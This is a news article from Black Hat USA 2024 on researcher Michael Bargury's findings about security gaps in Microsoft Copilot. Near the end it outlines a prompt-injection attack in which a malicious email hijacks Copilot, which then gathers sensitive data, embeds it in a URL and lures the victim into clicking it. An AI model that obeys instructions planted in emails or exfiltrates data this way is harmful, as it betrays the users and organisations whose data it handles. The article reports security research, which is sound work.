Black Hat USA 2024: Microsoft’s Copilot is freaking some researchers out


There’s a black box problem with AI. If you aren’t really sure how it makes decisions, how can you protect your data? As we attend Black Hat USA 2024, we dig deeper into the problem.

Despite Microsoft’s claims, cybersecurity researcher Michael Bargury demonstrated how Copilot Studio, which allows companies to build their own AI assistant, can be easily abused to exfiltrate sensitive enterprise data. We also met with Bargury during the Black Hat conference to learn more.

ADVERTISEMENT

“Microsoft is trying, but if we are honest here, we don't know how to build secure AI applications,” he said.

His view is that Microsoft will fix vulnerabilities and bugs as they arise, letting companies using their products do so at their own risk.

“The thing that's interesting about AI is that you don't see many cases where enterprises are adopting new technologies in six months. It doesn't happen. It didn't happen exactly. But now, Microsoft is just pushing every major bank [to implement AI]. This is why this is so scary,” Bargury added.

While Microsoft is surely working on many security mechanisms, experts like Bargury lack “observability” for customers, meaning they don’t really know what Copilot is doing on their behalf.

Which creates a black box problem with AI.

“You go to Copilot and look for an architecture picture, and you get this nice little caricature thing, but nobody's telling you what the orchestrator does on your behalf. How are decisions being made? Who's making what decision? It's all obscure from you because it's their thing, and they're going to secure it. So of course it's really difficult to secure,” Bargury said.

Because it’s so mysterious, he and his team went on to reverse engineer it hoping to figure out all the defense mechanisms. They’ve found ten different security mechanisms in Copilot, but that doesn’t really matter because “Copilot can read so much sensitive information, it becomes very vulnerable.” They’ve also discovered 15 different ways to break Copilot.

During the conference, Bargury showcased how attackers can abuse Copilot for Microsoft 365 to manipulate a financial transaction.

ADVERTISEMENT

“By sending a malicious email, an attacker takes over Copilot remotely and gets it to act as a malicious insider. Copilot searches for sensitive data, embeds that data in the choice of a URL, and lures the victim to click the URL thus exfiltrating the data to the attacker.”

Worried enterprises can, of course, opt out of using Copilot. However, as per Bargury, opting out of AI is not an option.

“You'll get it somewhere else. It will be baked into your products,” he added.